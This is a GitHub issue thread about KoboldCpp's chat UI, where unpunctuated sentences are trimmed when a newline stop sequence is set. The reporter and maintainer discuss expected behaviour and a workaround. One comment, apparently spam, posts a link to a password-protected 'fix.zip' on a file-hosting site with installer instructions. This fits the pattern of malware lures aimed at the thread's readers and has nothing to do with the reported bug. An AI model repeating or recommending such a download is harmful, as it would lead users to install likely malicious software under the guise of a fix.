### ISSUE TITLE
KoboldUI multi-user chat mode trims sentences even when trim sentences is off if I use a newline as a stop sequence

### ISSUE THREAD

**Issue by robobun7** [LostRuins/koboldcpp#1094]
**Describe the Issue**
If I have "\n" set as a stop sequence, then sentences that end in a newline instead of proper punctuation get trimmed even with the "Trim Sentences" checkbox disabled during multi-user chat. Strangely, it only happens if the output contains more than one sentence to begin with.

For example:

"Chatter: howdy! let's chat\n" gets turned into "Chatter: howdy!" after "\n" gets detected as a stop sequence, with "let's chat\n" trimmed.
However, without "\n" set as a stop sequence, it will act normally and turn something like "Chatter: howdy! let's chat\nChatter 2:" into "Chatter: howdy! let's chat" with only "\nChatter 2:" trimmed.

I have not tested this with single user chat mode. I don't know if the same thing happens there.

**Additional Information:**
I'm using Windows 10 Pro 22H2 and the latest version of KoboldCpp (1.73.1), running the UI in the latest version of Firefox (129.0.2).

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LostRuins** [comment]
I don't think that's a bug? The stop sequence trigger on the newline, returning `Chatter: howdy! let's chat`, then `let's chat` is not a complete sentence and gets trimmed to punctuation. If it was `let's chat!` instead it would have been fine.

**Comment by robobun7** [comment]
The problem is I had "trim sentences" disabled in the options, and I expected that to mean that "incomplete" (not punctuated) sentences would remain untrimmed. The stop sequence field does not mention that it also trims "incomplete" sentences and does not give any option to disable that functionality. I would expect it to respect the "trim sentences" option.

**Comment by LostRuins** [comment]
I tried this exact scenario and it worked fine for me. 

I would suggest removing "\n" from the stop sequences, and instead try turning off multiline replies 
![image](https://github.com/user-attachments/assets/6534e3ef-414f-4af9-9b4f-f8c2881c0c7d) see if that helps

**Comment by robobun7** [comment]
Yes, using that mode works and that is what I had done instead when I first had the issue with sentences being trimmed. I only reported this because the behavior was unexpected and it seemed to be unintentional.
